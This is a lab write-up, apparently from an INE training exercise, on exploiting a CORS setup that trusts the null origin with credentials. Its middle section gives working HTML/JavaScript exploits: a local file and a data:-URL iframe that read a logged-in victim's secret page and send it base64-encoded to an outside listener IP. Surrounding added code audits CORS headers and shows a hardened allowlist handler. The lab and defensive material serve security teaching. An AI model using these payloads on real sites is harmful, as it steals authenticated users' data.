Null Origin Exploitation
Objective: Exploit the vulnerable application to perform Null Origin exploitation and steal the contents of the secret page.
Logging into the web app with the supplied credentials loads a page secret.php.


Viewing the access-control headers shows that the site trusts the null origin (Access-Control-Allow-Origin: null) and also allows credentials (Access-Control-Allow-Credentials: true), so a request from a null-origin document is sent with the cookies stored in the browser for demo.ine.local and the response can be read. This means that either a local file or an iframe with an opaque origin can read the secret.
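To recognise this misconfiguration on your own servers, the following added check (not part of the lab) takes the Origin value that was sent in a probe request together with the response headers that came back, and returns findings. The sample header sets are constructed to match what the lab describes: a null origin trusted with credentials, and a safe allowlisted response for comparison.

```javascript
// Added example: audit one CORS response for the null-origin misconfiguration.
// sentOrigin is the Origin header value used in the probe request (or undefined);
// headers is a plain object of response headers, any case.
function auditCors(sentOrigin, headers) {
  // Normalise header names so lookups are case-insensitive.
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v).trim();

  const acao = h['access-control-allow-origin'];
  const credentials = (h['access-control-allow-credentials'] || '').toLowerCase() === 'true';
  const findings = [];

  if (acao === undefined) return findings; // no cross-origin read is granted

  if (acao === 'null') {
    // data: URLs, sandboxed iframes and file:// documents all send Origin: null,
    // so this value is never a safe thing to trust.
    findings.push(credentials
      ? 'CRITICAL: null origin trusted with credentials; authenticated responses readable from any opaque-origin document'
      : 'HIGH: null origin trusted; unauthenticated responses readable from any opaque-origin document');
  } else if (acao === '*') {
    // Browsers refuse "*" with credentials, but the server is still misconfigured.
    findings.push(credentials
      ? 'MEDIUM: wildcard origin combined with credentials (browser will block, server is misconfigured)'
      : 'INFO: wildcard origin without credentials; public data only');
  } else if (sentOrigin !== undefined && acao === sentOrigin) {
    // Echoing the request Origin is only safe if it was validated against an allowlist;
    // re-probe with an origin you do not control to tell reflection from an allowlist.
    findings.push('REVIEW: request origin reflected; confirm it is allowlisted, not echoed');
  }
  return findings;
}

// Constructed sample: what the lab's secret.php returned to a null-origin request.
const labResponse = {
  'Access-Control-Allow-Origin': 'null',
  'Access-Control-Allow-Credentials': 'true',
};

// Constructed sample: a hardened response that only names an allowlisted origin.
const safeResponse = {
  'Access-Control-Allow-Origin': 'http://demo.ine.local',
  'Access-Control-Allow-Credentials': 'true',
  'Vary': 'Origin',
};

function demo() {
  return {
    lab: auditCors('null', labResponse),
    safe: auditCors('http://demo.ine.local', safeResponse),
    unrelated: auditCors('http://attacker.example', safeResponse),
  };
}
```

Running demo() reports the CRITICAL finding for the lab's headers; for the hardened response it flags only that the echoed origin should be confirmed against the allowlist, and nothing at all when the response names an origin other than the one sent.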
Create an HTML file with the code below and open it locally; a file:// document has an opaque origin, so the request carries Origin: null.
<html>
<head>
<script>
// Fetch secret.php with the victim's cookies attached.
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
  if (xhr.readyState == XMLHttpRequest.DONE) {
    var r = xhr.responseText;
    console.log(r);
    // Cut the secret out of its <div> and base64-encode it.
    var d = btoa(r.split('<div class="my-4 text-2xl">')[1].split('</div>')[0].trim());
    // Send it to the listener as an image request path.
    function steal() {
      document.write('<img src="http://192.223.79.2:54321/' + d + '"/>');
    }
    steal();
  }
};
xhr.open('GET', 'http://demo.ine.local/secret.php', true);
xhr.withCredentials = true;
xhr.send();
</script>
</head>
</html>
Observe the incoming connection in the netcat listener; the requested path carries the secret in base64.

In a more realistic scenario the payload is hosted on another server. That page then has its own origin, which the site does not trust, so because of the same-origin policy the response cannot be read. But if the request is made from an iframe with an opaque origin (for example one loaded from a data: URL), the browser sends Origin: null, which satisfies the condition.
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
  if (xhr.readyState == XMLHttpRequest.DONE) {
    var r = xhr.responseText;
    console.log(r);
    var d = btoa(r.split('<div class="my-4 text-2xl">')[1].split('</div>')[0].trim());
    function steal() {
      document.write('<img src="http://192.190.158.2:54321/' + d + '"/>');
    }
    steal();
  }
};
xhr.open('GET', 'http://demo.ine.local/secret.php', true);
xhr.withCredentials = true;
xhr.send();
</script>
Base64 encode the above payload.

The file contents will look like the code below, with the base64 string from the previous step in place of the placeholder:
<html>
<body>
<iframe src="data:text/html;base64,BASE64_OF_THE_PAYLOAD_ABOVE"></iframe>
</body>
</html>
Now the secret will be sent.


Decode the value to get the secret.
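The fix on the server side is to stop trusting the null origin altogether. The added example below (not the lab's code) contrasts the weak handler that echoes whatever Origin arrives with a hardened one that compares the serialized origin exactly against an allowlist; the allowlist entry http://demo.ine.local is an assumed value for illustration. allowsRead models the browser's decision of whether a credentialed response may be read by a document at a given origin, so the two handlers can be compared without a browser.

```javascript
// Added example: weak versus hardened origin handling for credentialed CORS.
// Assumed allowlist for illustration; a real deployment lists its own front ends.
const ALLOWED_ORIGINS = new Set(['http://demo.ine.local']);

// Weak form: reflects the request Origin, including the literal "null".
function weakCorsHeaders(origin) {
  if (origin === undefined) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Hardened form: exact-match allowlist, never "null", never "*" with credentials.
function strictCorsHeaders(origin, allowed = ALLOWED_ORIGINS) {
  // No Origin (same-origin requests, navigations) or "null" (data: URLs,
  // sandboxed iframes, file://) get no CORS grant at all.
  if (typeof origin !== 'string' || origin === 'null') return {};
  // Compare the whole serialized origin; no prefix, suffix or regex matching,
  // so http://demo.ine.local.evil.example does not pass.
  if (!allowed.has(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    // The response varies by Origin; keep shared caches from serving it cross-origin.
    'Vary': 'Origin',
  };
}

// Model of the browser's check for a credentialed response: the allowed origin
// must equal the requesting document's origin exactly ("*" is refused with credentials).
function allowsRead(headers, documentOrigin) {
  const acao = headers['Access-Control-Allow-Origin'];
  const creds = headers['Access-Control-Allow-Credentials'] === 'true';
  return creds && acao !== undefined && acao !== '*' && acao === documentOrigin;
}

// Compare both handlers for a set of requesting origins.
function compare(origins) {
  const out = {};
  for (const o of origins) {
    out[o] = {
      weak: allowsRead(weakCorsHeaders(o), o),
      strict: allowsRead(strictCorsHeaders(o), o),
    };
  }
  return out;
}

// Constructed probe origins: the trusted site, the opaque origin an iframe or
// local file sends, and a look-alike host.
const PROBES = ['http://demo.ine.local', 'null', 'http://demo.ine.local.evil.example'];
```

compare(PROBES) shows the weak handler granting a credentialed read to every probe, including null, while the strict handler grants it only to the allowlisted origin.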
